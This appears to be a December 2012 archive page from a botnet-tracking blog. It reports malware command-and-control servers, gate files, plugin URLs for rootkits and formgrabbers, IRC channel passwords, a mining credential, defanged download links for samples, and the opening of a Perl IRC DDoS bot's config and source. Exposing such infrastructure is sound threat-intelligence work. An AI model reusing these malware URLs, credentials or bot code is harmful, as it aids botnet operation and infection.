Month: December 2012

beerpigfarm.ru (Installs crap hosted by Santex.net)


Resolved beerpigfarm.ru to 46.166.130.216
I found a file on h4r3's latest andromeda that downloaded a bunch of crap from this site.
hxxp://beerpigfarm.ru/smo Smoke loader, posted here
hxxp://beerpigfarm.ru/min is a bitcoin miner, uses 50btc
Mining info: http://169TpR47JVcLaQXdGYE6Lv4Ps9DbVqHhSi:x@pool.50btc.com:8332
Since he's using no account mode we can snoop on his mining by plugging in his address on the
Read more...

group-gz.me (Andromeda http botnet hosted by Panamaserver.com)


Resolved group-gz.me to 190.123.47.198
Server: group-gz.me
Gate file: /.daci/perete.php
Plugins
Rootkit: group-gz.me/.daci/r.pack
Socks: group-gz.me/.daci/s.pack
Formgrabber: group-gz.me/.daci/f.pack
Gate file: group-gz.me/.daci/fg.php
This guy is installing the recently posted survey winlocker on his bots.
Hosting infos: http://whois.domaintools.com/190.123.47.198

honey.punked.us (Andromeda http botnet hosted by kimsufi.com)


Resolved honey.punked.us to 94.23.213.78
Server: honey.punked.us
Gate file: /sex/image.php
Plugins
Rootkit: http://doncarlosmayorista.com/.sec/r.pack
Socks: http://doncarlosmayorista.com/.sec/s.pack
Formgrabber: http://doncarlosmayorista.com/.sec/f.pack
Gate file: honey.punked.us/sex/fg.php
This is the new andromeda of the french hecker h4r3. Now he's using cracked andromeda with free domains.
Hosting infos: http://whois.domaintools.com/94.23.213.78

64.56.64.29(ngr botnet hosted in United States Los Angeles Perfect International In)


server: 64.56.64.29:1887
server: 174.37.172.71:1887
server: 184.172.60.181:1887
server: 5.153.6.203 TCP:1887
Server Password:
Username: hxfyijc
Nickname: n{DE|XPa}hxfyijc
Channel: #pool (Password: leonis)
Channel: #r3
Channel topic: :~pu hxxp://hotfile.com/dl/184384511/5b0f4b2/omaigato.exe 765cce9dee5448f58d9e798d91dbf809 ~s -o ~s
Find more infos about the owner and domains by searching for 1887 in this blog.
Downloaded samples:
hxxp://199.7.177.244/dl/184384734/6e6cd1d/all.exe ==> downloads these links:
hxxp://80.86.83.93/index (2musicaonline.com)
hxxp://80.86.83.93/Emo-Screamo/ (2musicaonline.com)
hxxp://hotfile.com/dl/184299133/b91a140/8346g527rg239gth34t24t.html
Thanks to aLiSs the turkish kebap for submitting samples.
Hosting infos: http://whois.domaintools.com/64.56.64.29

unlockyourdesktop.info (Winlocker hosted by nerdie.net)


Resolved unlockyourdesktop.info to 199.96.156.208
Yet another survey based winlocker. This one follows the established pattern of ukash and moneypack winlockers by loading a webpage that contains the surveys rather than simply loading the offers like the previous variants.
[Image: Winlocker site showing offers]
This version does not appear to do anything to prevent the use of
Read more...

zxz.consulting-info.eu (Multiple http botnets hosted by France Roubaix Ovh Sas)


Resolved zxz.consulting-info.eu to 5.39.71.80
This is the french hecker known as h4r3 who has been posted before.
Andromeda
This is the same andromeda net that was posted before, just with the rest of the domains.
Previous/disabled domains:
vvv.exp1oit.in
xxx.be-shopping.net
Current domain: zxz.consulting-info.eu
Gate file: /service/image.php
Plugins:
Rootkit: tbontepaard.nl/gllr/r.pack
Socks: tbontepaard.nl/gllr/s.pack
kbot
Server: zxz.consulting-info.eu
Gate
Read more...

Master Poko Perlbot vS PiF(linux bots hosted in France Paris Gandi Sas)


var $config = array(
"server"=>"92.243.21.133",
"port"=>"6667",
"pass"=>"",
"prefix"=>"soldiers",
"maxrand"=>"5",
"chan"=>"#ddos2",
"chan2"=>"#ddos2",
"key"=>"ddos",
"modes"=>"+p",
"password"=>"dor",
"trigger"=>".",
"hostauth"=>"*"

Local users: Current Local Users: 188 Max: 190
Global users: Current Global Users: 188 Max: 190
around 130 linux bots in #unix

Master Poko Perlbot vS PiF:
#!/usr/bin/perl
#
# Master Poko Perlbot vS PiF
#
my @mast3rs = ("Norman","Norman-");
my
Read more...